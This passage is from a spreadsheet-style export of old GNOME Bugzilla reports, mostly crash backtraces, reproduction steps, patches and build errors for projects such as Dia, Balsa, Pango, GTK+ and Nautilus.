/usr/lib/libgtk-x11-2.0.so.0
#39 0x404e4f92 in gtk_propagate_event () from
/usr/lib/libgtk-x11-2.0.so.0
#40 0x404e3ce6 in gtk_main_do_event () from
/usr/lib/libgtk-x11-2.0.so.0
#41 0x406e2195 in _gdk_events_queue () from
/usr/lib/libgdk-x11-2.0.so.0
#42 0x40b83b92 in g_main_depth () from /usr/lib/libglib-2.0.so.0
#43 0x40b84c88 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
#44 0x40b84fc0 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
#45 0x40b85603 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#46 0x404e35a3 in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
#47 0x0809de2f in main ()
Thread 1 (Thread 16384 (LWP 4493)):
#0  0x40b1abe8 in waitpid () from /lib/libpthread.so.0
No symbol table info available.
#1  0x401ab7fc in ?? () from /usr/lib/libgnomeui-2.so.0
No symbol table info available.
#2  0x40168f48 in libgnomeui_module_info_get ()
   from /usr/lib/libgnomeui-2.so.0
No symbol table info available.
#3  0x40b19825 in __pthread_sighandler () from /lib/libpthread.so.0
No symbol table info available.
#4  
No symbol table info available.
#5  0x4002f1d7 in data_get_sorted_selected () from
/usr/lib/dia/libdia.so
No symbol table info available.
#6  0x4103256f in PyDiaDiagram_New () from
/usr/lib/dia/libpython_plugin.so
No symbol table info available.
#7  0x4109b88d in PyCFunction_Call () from /usr/lib/libpython2.3.so.1.0
No symbol table info available.
#8  0x410d1012 in PyEval_GetFuncDesc () from
/usr/lib/libpython2.3.so.1.0
No symbol table info available.
#9  0x410cedb1 in PyEval_EvalCode () from /usr/lib/libpython2.3.so.1.0
No symbol table info available.
#10 0x410cf99c in PyEval_EvalCodeEx () from
/usr/lib/libpython2.3.so.1.0
No symbol table info available.
#11 0x4108b73a in PyStaticMethod_New () from
/usr/lib/libpython2.3.so.1.0
No symbol table info available.
#12 0x41073e77 in PyObject_Call () from /usr/lib/libpython2.3.so.1.0
No symbol table info available.
#13 0x4107cedb in PyMethod_Fini () from /usr/lib/libpython2.3.so.1.0
No symbol table info available.
#14 0x41073e77 in PyObject_Call () from /usr/lib/libpython2.3.so.1.0
No symbol table info available.
#15 0x410d0c8a in PyEval_CallObjectWithKeywords ()
   from /usr/lib/libpython2.3.so.1.0
No symbol table info available.
#16 0x41073e2c in PyObject_CallObject () from
/usr/lib/libpython2.3.so.1.0
No symbol table info available.
#17 0x412283e6 in initgobject ()
   from /usr/lib/python2.3/site-packages/gtk-2.0/gobject.so
No symbol table info available.
#18 0x40ad0c20 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#19 0x40ae4c25 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#20 0x40ae3be7 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#21 0x40ae3ee4 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#22 0x404292b5 in gtk_button_clicked () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#23 0x4042a2cb in _gtk_button_paint () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#24 0x40ae5121 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#25 0x40ad0fb7 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#26 0x40ad0c20 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#27 0x40ae444e in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#28 0x40ae3be7 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#29 0x40ae3ee4 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#30 0x40429205 in gtk_button_released () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#31 0x4042a14b in _gtk_button_paint () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#32 0x404e69f4 in _gtk_marshal_BOOLEAN__BOXED ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#33 0x40ad0fb7 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#34 0x40ad0c20 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#35 0x40ae4655 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#36 0x40ae39be in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#37 0x40ae3ee4 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#38 0x405e58e7 in gtk_widget_send_expose () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#39 0x404e4f92 in gtk_propagate_event () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#40 0x404e3ce6 in gtk_main_do_event () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#41 0x406e2195 in _gdk_events_queue () from
/usr/lib/libgdk-x11-2.0.so.0
No symbol table info available.
#42 0x40b83b92 in g_main_depth () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#43 0x40b84c88 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#44 0x40b84fc0 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#45 0x40b85603 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#46 0x404e35a3 in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#47 0x0809de2f in main ()
No symbol table info available.
#0  0x40b1abe8 in waitpid () from /lib/libpthread.so.0
------- Bug moved to this database by unknown@bugzilla.gnome.org 2004-11-22 11:38 -------
Unknown platform unknown. Setting to default platform Other.
Unknown milestone unknown in product dia.
   Setting to default milestone for this product '---'
Setting to default status UNCONFIRMED.
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>horkana</t>
  </si>
  <si>
    <t>RHYTHMBOX-478715</t>
  </si>
  <si>
    <t>Cosmetic enhancement for MTP devices with no owner name</t>
  </si>
  <si>
    <t>Please describe the problem:
This patch solves a problem for mtp devices that do not support setting the owner name.
If the owner name is not set or hardcoded to ????? it shows the model name instead in the rhythmbox sidebar.
Attached goes an svn diff. 
Steps to reproduce:
Plug and mtp device with no owner name.. or lack of support for it..
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>xhaker</t>
  </si>
  <si>
    <t>EVOLUTION-504051</t>
  </si>
  <si>
    <t>Warnings observed with opening Drafts message with emoticon images</t>
  </si>
  <si>
    <t>Milan noticed this in bug #502205.  It doesn't seem to affect functionality at all though so I'm calling the severity minor.
Steps to Reproduce:
1) Run Evolution from a terminal.
2) Open a new HTML mail message and insert emoticon images [1].
3) Save the message to Drafts and close the window.
4) Reopen the message from Drafts to continue editing.
Actual Result:
A warning for each emoticon image:
(evolution:10984): gtkhtml-WARNING **: No such file or directory
Excepted Result:
No warning.
Additional Information:
It appears GtkHTML is trying to open the MIME Content-Id for the image as if it were a file URI.  As such I'm not sure whether the problem is in Evolution or GtkHTML.  Leaving the component as Evolution for now.
[1] This step requires GtkHTML 2.17.5.  You can also do it on earlier
    versions by typing an ASCII emoticon (e.g. :-) ) and having it
    automatically converted to an image.</t>
  </si>
  <si>
    <t>mbarnes</t>
  </si>
  <si>
    <t>GLOM-525089</t>
  </si>
  <si>
    <t>Show selected record when clicking Details tab</t>
  </si>
  <si>
    <t>Using 1.6.11 on Hardy.
When selecting a row in list view and then activating the details tab the record that is shown is not the one selected in list view but whatever was last in details view.
IMHO the effect should be the same as clicking on the icon at the front of the row in list view that is activating the details view on that particular row.
The current situation makes the back and forward buttons in detail view *seem* to behave erratically on the first press because of this.</t>
  </si>
  <si>
    <t>GALEON-63202</t>
  </si>
  <si>
    <t>[Prefs] Mouse</t>
  </si>
  <si>
    <t>i think the context on context menus should be on by default and hidden
but other have said different things
donno about the wheel prefs</t>
  </si>
  <si>
    <t>PYGOBJECT-103611</t>
  </si>
  <si>
    <t>code generator should support include</t>
  </si>
  <si>
    <t>There should be a way for the include files to support inclusion of other
files similar to #include in cpp.
#include can not be used since it's done in the beginning of the
compilation process and we need it before when we generating the c output. 
Proposed syntax:
Single:
%%
include file.override
Multiple:
%%
include 
    foo.override
    bar.override</t>
  </si>
  <si>
    <t>PANGO-122844</t>
  </si>
  <si>
    <t>segfault in pango-markup parse functions</t>
  </si>
  <si>
    <t>In pango-markup.c there's a comment:
  /* note ot may be NULL if the user didn't want the attribute list */
but some of the parse functions like sup_parse_func assume it is not NULL.
Program received signal SIGSEGV Segmentation fault.
0x4003780c in sup_parse_func (md=0x8050528 tag=0x0 names=0xbffff744
values=0xbffff744 context=0x80509b0
    error=0xbffff740) at pango-markup.c:1281
1281      tag-&gt;scale_level_delta -= 1
(gdb) bt
#0  0x4003780c in sup_parse_func (md=0x8050528 tag=0x0 names=0xbffff744
values=0xbffff744
    context=0x80509b0 error=0xbffff740) at pango-markup.c:1281
#1  0x40035b85 in start_element_handler (context=0x80509b0
element_name=0x8050e98 sup
    attribute_names=0xbffff744 attribute_values=0xbffff744
user_data=0x8050528 error=0xbffff740)
    at pango-markup.c:395
#2  0x400f0f38 in g_markup_parse_context_parse (context=0x80509b0
text=0xbffff744  text_len=134549144
    error=0xbffff84c) at gmarkup.c:1219
#3  0x40036046 in pango_parse_markup (
    markup_text=0x8050328 ye bisshop baythes hyï¿½\204 ï¿½\235et
wt bale at his hert\nyagï¿½\205hï¿½\205 meï¿½\204 menskid hiï¿½\204 so
how hit myï¿½\235t worthe\nyt his clothes wer so clene in
cloutes me thynkes\nhom burde ... length=503 accel_marker=0
attr_list=0x0 text=0x0 accel_char=0x0
    error=0xbffff84c) at pango-markup.c:638
#4  0x0804a25d in main (argc=2 argv=0xbffff8d4) at pangoft2topgm.c:334
(gdb)
Not sure what the right fix is..</t>
  </si>
  <si>
    <t>GTK+-127668</t>
  </si>
  <si>
    <t>Small error in tree and list widget overview</t>
  </si>
  <si>
    <t>Hi
There is missing a comma after FALSE in the following example:
gtk_tree_store_set (store &amp;iter
                    TITLE_COLUMN The Principle of Reason
                    AUTHOR_COLUMN Martin Heidegger
                    CHECKED_COLUMN FALSE
                    -1)
The url for the page is
http://developer.gnome.org/doc/API/2.0/gtk/TreeWidget.html
I took me some minutes to figuere out as there was no compiler warning.
Jonas</t>
  </si>
  <si>
    <t>y2003</t>
  </si>
  <si>
    <t>GTK-ENGINES-125917</t>
  </si>
  <si>
    <t>Volume slider slides out of its scope on volume Up</t>
  </si>
  <si>
    <t xml:space="preserve">Package: totem
Severity: trivial
Version: GNOME2.2.2 0.99.7
os_details: Ximian Inc.
Synopsis: Volume slider slides out of its scope on volume Up
Bugzilla-Product: totem
Bugzilla-Component: general
Description:
Description of Problem:
If the volume slider is maxed using volume up (up key or menu entry in
sound--&gt;volume up) the widget for the volume indicator will extend
slightly out of the volume slider. Clicking on the indicator will set it
back correctly graphically.
Steps to reproduce the problem:
1. press vol up key until max
2. 
3. 
Actual Results:
Volume indicator extends slightly out of volume bar
Expected Results:
Volume indicator remains within volume bar boundary
How often does this happen?
Always
Additional Information:
Screenshot available if this only happens to me not sure how to attach
it through bugzilla thought..
------- Bug moved to this database by unknown@bugzilla.gnome.org 2003-10-31 08:10 -------
Reassigning to the default owner of the component hadess@hadess.net.
</t>
  </si>
  <si>
    <t>thos</t>
  </si>
  <si>
    <t>Dongois.Antoine</t>
  </si>
  <si>
    <t>PYORBIT-126477</t>
  </si>
  <si>
    <t>pyORBit and threading</t>
  </si>
  <si>
    <t>This bug was originally reported in the debian BTS:
http://bugs.debian.org/217852
It is currently not possible to use pyORBit and threading. If I run the
attached python script it will print out numbers up to a certain point
and then stop. The equivalent C program (also attached - compile with
gcc `pkg-config --libs ORBit-2.0` `pkg-config --cflags ORBit-2.0` -Wall
orbit.c -o orbit) works.</t>
  </si>
  <si>
    <t>GNOME-PANEL-674760</t>
  </si>
  <si>
    <t>Mageia Cauldron Beta3 Gnome-classic lower-panel missing place for favourites.</t>
  </si>
  <si>
    <t>Description of problem:
Cauldron Gnome-Classic (Beta3) is very useful.
But missing the facility of placing my favourites together I use the lower
panel to place my favourite icons.
But after dragging program icons to this lower-panel it is no more possible to
delete these icons if needed.</t>
  </si>
  <si>
    <t>mthate90</t>
  </si>
  <si>
    <t>GIMP-150965</t>
  </si>
  <si>
    <t>dockable dialogs: after closing one can't get it back</t>
  </si>
  <si>
    <t>Do this:
1. File-&gt;Dialogs-&gt;Gradients
2. Close the dock or the dialog.
3. File-&gt;Dialogs-&gt;Gradients
Expected results: A gradient dialog.
Actual results: nothing.
The same thing seems to happen for every type of dockable dialog:  I can create
one but after closing it I can't recreate it.
Interestingly File-&gt;Dialogs-&gt;Create New Dock-&gt;Brushes Patterns Gradients
does still give all of the dialogs that cannot be created directly.
(System: FC2/Gnome/gtk2.4.4/glib2.4.4)</t>
  </si>
  <si>
    <t>weskaggs</t>
  </si>
  <si>
    <t>NAUTILUS-47104</t>
  </si>
  <si>
    <t>A new broken link does not show up after creating it with Duplicate</t>
  </si>
  <si>
    <t xml:space="preserve">1) Start a GNOME-terminal
2) cd to your home folder and type touch cow.txt
3) Start Nautilus
4) Right click on cow.txt and click Create link
5) Move cow.txt to the trash
6) Right click on the link to cow.txt symlink and click Duplicate
7) Note that no duplicate appears.
8) Click on Refresh in the toolbar
Note that the duplicated file appears.
Nautilus should either 1) Fail to duplicate a broken link or 2) Show it the
first time around.
Josh
------- Additional Comments From snickell@stanford.edu 2001-07-23 00:35:09 ----
Taking bugs previously assigned to Pavel assigning them to myself. Will parse
them out at my leisure  but many are GnomeVFS bugs we should look at for 2.0
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-09 21:03 -------
</t>
  </si>
  <si>
    <t>GAL-200077</t>
  </si>
  <si>
    <t>Double Click Notification on ETable</t>
  </si>
  <si>
    <t>NETWORKMANAGER-328780</t>
  </si>
  <si>
    <t>Gentoo backend missing nm_system_device_get_disabled</t>
  </si>
  <si>
    <t>Please describe the problem:
Summary pretty much says it all... Patch attached
Steps to reproduce:
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>GNOME-VFS-60642</t>
  </si>
  <si>
    <t>gnome-vfs assumes gethostbyname is thread-safe</t>
  </si>
  <si>
    <t>gnome_vfs_inet_connection_create calls gethostbyname() which is not
guaranteed to be thread-safe/reentrant. This makes programs that try
to open multiple http/ftp/whatever connections in rapid succession
hang on platforms where it's not.
Linux and Solaris both define gethostbyname_r but unfortunately they
define it differently. The BSDs mostly seem not to define it. Yay.
Anyway evolution/e-util/e-host-utils.c sort of shows how to handle
the various permutations although it's really an awful interface and
you probably don't want to just copy it.
This applies to both gnome-vfs-1 and the trunk.</t>
  </si>
  <si>
    <t>GSTREAMER-109994</t>
  </si>
  <si>
    <t>[0.6.1] libgstgconf isn't linked against libgstreamer</t>
  </si>
  <si>
    <t>See also http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=187353</t>
  </si>
  <si>
    <t>GTK+-444457</t>
  </si>
  <si>
    <t>Segfault in gdk_window_set_opacity when opacity &lt; 1.0</t>
  </si>
  <si>
    <t>When opacity &lt; 1.0 gdk_window_set_opacity causes a segfault in XChangeProperty.  I think the problem is that it passes 'cardinal' directly whereas XChangeProperty expects an array.  The attached patch prevents the segfault but I can't verify if it actually works as expected since my window manager doesn't seem to support opacity.</t>
  </si>
  <si>
    <t>kaffeetisch</t>
  </si>
  <si>
    <t>METACITY-322071</t>
  </si>
  <si>
    <t>Bottom constraint overly restrictive</t>
  </si>
  <si>
    <t>I don't really see a lot of reason to ensure that so much of the window be
visible on the bottom -- really as long as the titlebar is kept onscreen it
should be enough.  So maybe modify the bottom constraint to the height of the
titlebar for decorated windows?  This is closer to the way the old metacity worked.
Not sure if there's a technical or usability reason for the change though.</t>
  </si>
  <si>
    <t>readams</t>
  </si>
  <si>
    <t>PYGTK-53089</t>
  </si>
  <si>
    <t>Can't unset the cursor</t>
  </si>
  <si>
    <t>I can set a cursor on a window using:
	w.get_window().set_cursor(cursor_new(n))
But I can't clear it with:
	w.get_window().set_cursor(None)
In the C API I can pass NULL to gdk_window_set_cursor() to
remove the cursor (it will then use the parent window's cursor).
Thanks</t>
  </si>
  <si>
    <t>GNOPERNICUS-140965</t>
  </si>
  <si>
    <t>Open Second Window Application speech stopped working</t>
  </si>
  <si>
    <t>1.Bring up gnompernicus
2. Open 1st application
3. Goto couple menus
4. Listen for speech
5. Open another application
6. Go tthrough couple menus 
7. Listen for speech
No Speech. Speech is no longer working. Reset is needed.</t>
  </si>
  <si>
    <t>firm</t>
  </si>
  <si>
    <t>tony_c_vuong</t>
  </si>
  <si>
    <t>LIBRSVG-161823</t>
  </si>
  <si>
    <t>librsvg-2.8.1: moz-plugin.c assumes stdint.h was always available</t>
  </si>
  <si>
    <t xml:space="preserve">I'm getting the following compile error on NetBSD/sparc-1.5:
...
checking for stdint.h... no
...
 gcc -DHAVE_CONFIG_H -I. -I. -I.. -I/usr/local/mozilla-1.7/include/plugin -I/usr
/local/mozilla-1.7/include/java -I/usr/local/mozilla-1.7/include/nspr -DBINDIR=\
/usr/local/bin/\ -I/usr/local/include/gtk-2.0 -I/usr/local/lib/gtk-2.0/include
 -I/usr/local/include -I/usr/X11R6/include -I/usr/local/include/pango-1.0 -I/usr
/local/include/freetype2 -I/usr/local/include/glib-2.0 -I/usr/local/lib/glib-2.0
/include -I/usr/X11R6/include -O2 -mcpu=v8 -c moz-plugin.c -Wp-MD.deps/moz-plu
gin.TPlo  -fPIC -DPIC -o .libs/moz-plugin.o
moz-plugin.c:29: stdint.h: No such file or directory
gmake[2]: *** [moz-plugin.lo] Error 1
gmake[2]: Leaving directory `/aux/adrian/build/librsvg-2.8.1/moz-plugin'
gmake[1]: *** [all-recursive] Error 1
gmake[1]: Leaving directory `/aux/adrian/build/librsvg-2.8.1'
gmake: *** [all] Error 2
</t>
  </si>
  <si>
    <t>F-SPOT-336905</t>
  </si>
  <si>
    <t>f-spot exits when trying to view metadata</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. start f-spot import some photos
2. select some photo then click on View -&gt; metadata viewer
Stack trace:
f-spot just exits with code 01 (gdb attached to /usr/lib/f-spot/f-spot.exe)
Other information:
I am running FC5 (upgraded from FC4)</t>
  </si>
  <si>
    <t>vlada</t>
  </si>
  <si>
    <t>BALSA-125408</t>
  </si>
  <si>
    <t>Crash when trying to reply to email</t>
  </si>
  <si>
    <t xml:space="preserve">Package: balsa
Severity: normal
Version: 2.0.15
Synopsis: Crash when trying to forward email
Bugzilla-Product: balsa
Bugzilla-Component: general
BugBuddy-GnomeVersion: 2.0 (2.2.2)
Description:
Description of Problem:
Sudden crash when trying to foraward an email.
Debugging Information:
Backtrace was generated from '/usr/local/bin/balsa'
[New Thread 16384 (LWP 13672)]
[New Thread 32769 (LWP 13673)]
0x40e4ba96 in waitpid () from /lib/libpthread.so.0
#0  0x40e4ba96 in waitpid () from /lib/libpthread.so.0
#1  0x40071a0c in libgnomeui_module_info_get () from
/usr/lib/libgnomeui-2.so.0
#2  0x40e4a685 in __pthread_sighandler () from /lib/libpthread.so.0
#3  0x40fe95f8 in __libc_sigaction () from /lib/libc.so.6
#4  0x080b1dc3 in sendmsg_window_new (widget=0x0 message=0x85673a8 
    type=SEND_REPLY) at sendmsg-window.c:2773
#5  0x08071e46 in bndx_compose_foreach (w=0x8230048 index=0xfffffe00 
    send_type=SEND_REPLY) at balsa-index.c:1641
#6  0x08071ed2 in balsa_message_reply (widget=0xfffffe00
user_data=0xfffffe00)
    at balsa-index.c:1655
#7  0x40d0d212 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
#8  0x40cfca92 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#9  0x40d0cda6 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
#10 0x40d0bec2 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#11 0x40d0c0d6 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#12 0x409d8537 in gtk_button_clicked () from
/usr/lib/libgtk-x11-2.0.so.0
#13 0x409d94fb in _gtk_button_paint () from
/usr/lib/libgtk-x11-2.0.so.0
#14 0x40d0d212 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
#15 0x40cfcd44 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
#16 0x40cfca92 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#17 0x40d0c6c4 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
#18 0x40d0bec2 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#19 0x40d0c0d6 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#20 0x409d8487 in gtk_button_released () from
/usr/lib/libgtk-x11-2.0.so.0
#21 0x409d937b in _gtk_button_paint () from
/usr/lib/libgtk-x11-2.0.so.0
#22 0x40a60282 in _gtk_marshal_BOOLEAN__BOXED ()
   from /usr/lib/libgtk-x11-2.0.so.0
#23 0x40cfcd44 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
#24 0x40cfca92 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#25 0x40d0c895 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
#26 0x40d0bca3 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#27 0x40d0c0d6 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#28 0x40b3ec6b in gtk_widget_send_expose () from
/usr/lib/libgtk-x11-2.0.so.0
#29 0x40a60057 in gtk_propagate_event () from
/usr/lib/libgtk-x11-2.0.so.0
#30 0x40a5edb6 in gtk_main_do_event () from
/usr/lib/libgtk-x11-2.0.so.0
#31 0x40c18f85 in _gdk_events_queue () from
/usr/lib/libgdk-x11-2.0.so.0
#32 0x40d49086 in unblock_source () from /usr/lib/libglib-2.0.so.0
#33 0x40d4a029 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
#34 0x40d4a347 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
#35 0x40d4a9b0 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#36 0x40a5e5df in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
#37 0x0809874f in main (argc=1 argv=0xbffffd44) at main.c:433
Thread 2 (Thread 32769 (LWP 13673)):
#0  0x4108f6e6 in poll () from /lib/libc.so.6
No symbol table info available.
#1  0x40e448fe in __pthread_manager () from /lib/libpthread.so.0
No symbol table info available.
Thread 1 (Thread 16384 (LWP 13672)):
#0  0x40e4ba96 in waitpid () from /lib/libpthread.so.0
No symbol table info available.
#1  0x40071a0c in libgnomeui_module_info_get () from
/usr/lib/libgnomeui-2.so.0
No symbol table info available.
#2  0x40e4a685 in __pthread_sighandler () from /lib/libpthread.so.0
No symbol table info available.
#3  0x40fe95f8 in __libc_sigaction () from /lib/libc.so.6
No symbol table info available.
#4  0x080b1dc3 in sendmsg_window_new (widget=0x0 message=0x85673a8 
    type=SEND_REPLY) at sendmsg-window.c:2773
	model = (BalsaToolbarModel *) 0xfffffe00
	toolbar = (GtkWidget *) 0x88e6248
	window = (GtkWidget *) 0x88f3468
	paned = (GtkWidget *) 0x88b0d70
	bsmsg = (BalsaSendmsg *) 0x40e4cd38
	i = 3221220140
	tmp = (gchar *) 0xbfffee80 
------- Bug moved to this database by unknown@bugzilla.gnome.org 2003-10-24 11:40 -------
Reassigning to the default owner of the component pawsa@theochem.kth.se.
</t>
  </si>
  <si>
    <t>ad.l</t>
  </si>
  <si>
    <t>GNOME-CORE-50636</t>
  </si>
  <si>
    <t>crash when text is scrolling [zvt_term_motion_notify]</t>
  </si>
  <si>
    <t xml:space="preserve">Package:  gnome-core
Severity: normal
Version:  1.2.1
Synopsis: telnet and cat application
Class:    sw-bug
Distribution: Red Hat Linux release 7.0 (Guinness)
System: Linux 2.2.16-22 i686 unknown
C library: glibc-2.1.92-14
C compiler: 2.96
glib: 1.2.8
GTK+: 1.2.8
ORBit: ORBit 0.5.3
gnome-libs: gnome-libs 1.2.4
libxml: 1.8.9
gnome-print: gnome-print-0.20
gnome-core: gnome-core 1.2.1
Description:
I telnet to another server and use cat program to display log file and
then is core dump happening.
Debugging information:
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
0x405755a9 in __wait4 () from /lib/libc.so.6
#0  0x405755a9 in __wait4 () from /lib/libc.so.6
#1  0x405df824 in __DTOR_END__ () from /lib/libc.so.6
#2  0x40115b38 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
#3  
#4  0x404b054f in vt_getmatches () from /usr/lib/libzvt.so.2
#5  0x404b69a6 in zvt_term_motion_notify () from /usr/lib/libzvt.so.2
#6  0x4026257e in gtk_marshal_BOOL__POINTER () from /usr/lib/libgtk-1.2.so.0
#7  0x40293f8c in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
#8  0x40291cf5 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#9  0x402cbc39 in gtk_widget_event () from /usr/lib/libgtk-1.2.so.0
#10 0x402624f5 in gtk_propagate_event () from /usr/lib/libgtk-1.2.so.0
#11 0x402615bf in gtk_main_do_event () from /usr/lib/libgtk-1.2.so.0
#12 0x40316c21 in gdk_event_dispatch () from /usr/lib/libgdk-1.2.so.0
#13 0x40492987 in g_main_dispatch () from /usr/lib/libglib-1.2.so.0
#14 0x40493001 in g_main_iterate () from /usr/lib/libglib-1.2.so.0
#15 0x404931cc in g_main_run () from /usr/lib/libglib-1.2.so.0
#16 0x40260e57 in gtk_main () from /usr/lib/libgtk-1.2.so.0
#17 0x8054237 in new_terminal_for_client ()
#18 0x8054277 in main ()
#19 0x404dbb65 in __libc_start_main (main=0x8054250  argc=3 
    ubp_av=0xbffff924 init=0x804c80c  fini=0x8054dfc  
    rtld_fini=0x4000df24  stack_end=0xbffff91c)
    at ../sysdeps/generic/libc-start.c:111
#0  0x405755a9 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x405df824 in __DTOR_END__ () from /lib/libc.so.6
No symbol table info available.
#2  0x40115b38 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
No symbol table info available.
#3  
No locals.
#4  0x404b054f in vt_getmatches () from /usr/lib/libzvt.so.2
No symbol table info available.
#5  0x404b69a6 in zvt_term_motion_notify () from /usr/lib/libzvt.so.2
No symbol table info available.
#6  0x4026257e in gtk_marshal_BOOL__POINTER () from /usr/lib/libgtk-1.2.so.0
No symbol table info available.
#7  0x40293f8c in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
No symbol table info available.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-02-07 01:02 -------
Unknown version 1.2.x in product gnome-core. Setting version to the default unspecified.
The original reporter (seal@lnx.cat.or.th) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component gnome-core-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>seal</t>
  </si>
  <si>
    <t>DESKBAR-APPLET-621288</t>
  </si>
  <si>
    <t>Mark a translatable Unicode string as such</t>
  </si>
  <si>
    <t>Created attachment 163378
Mark a translatable Unicode string as such
Patch to mark a translatable string which contains Unicode characters as a Python Unicode string. This should fix any problems with it being translated if there were any (see bug #591496).</t>
  </si>
  <si>
    <t>GNOME-VFS-121182</t>
  </si>
  <si>
    <t>register enum GTypes</t>
  </si>
  <si>
    <t>This patch adds the get_type() functions to register GTypes for the enums
as other GNOME libraries do. We need this for gtkmm and I think it's
necessary for use in GValues.</t>
  </si>
  <si>
    <t>BUGZILLA.GNOME.ORG-54798</t>
  </si>
  <si>
    <t>Evolution crash after startup</t>
  </si>
  <si>
    <t xml:space="preserve">Package: bugzilla.gnome.org
Severity: normal
Version: 0.10
Synopsis: Evolution crash after startup
Bugzilla-Product: bugzilla.gnome.org
Bugzilla-Component: bug data
Description:
After setting Evolution-mail to suid to avoid a locking problem with /var/spool/mail/$user - evolution crashes with a segv on startup
Debugging Information:
(no debugging symbols found)...[New Thread 1024 (LWP 3177)]
0x408bb519 in __wait4 ()
   from /lib/i686/libc.so.6
#0  0x408bb519 in __wait4 () from /lib/i686/libc.so.6
#1  0x4092b9e4 in __DTOR_END__ () from /lib/i686/libc.so.6
#2  0x4064b563 in waitpid (pid=3221 stat_loc=0xbfffdb4c options=0)
    at wrapsyscall.c:172
#3  0x4027a28a in gnome_segv_handle (signum=11) at gnome-init.c:659
#4  0x40649935 in pthread_sighandler (signo=11 ctx=
      {gs = 7 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 edi = 135260872 esi = 135166224 ebp = 3221217056 esp = 3221217012 ebx = 135674032 edx = 0 ecx = 135674032 eax = 134742629 trapno = 14 err = 4 eip = 1082678442 cs = 35 __csh = 0 eflags = 66118 esp_at_signal = 3221217012 ss = 43 __ssh = 0 fpstate = 0xbfffdc78 oldmask = 2147483648 cr2 = 0})
    at signals.c:97
#5  
#6  0x40885caa in strcmp () from /lib/i686/libc.so.6
#7  0x080604c3 in e_shell_view_menu_setup () at eval.c:41
#8  0x40422925 in gtk_marshal_NONE__POINTER (object=0x80f5330 
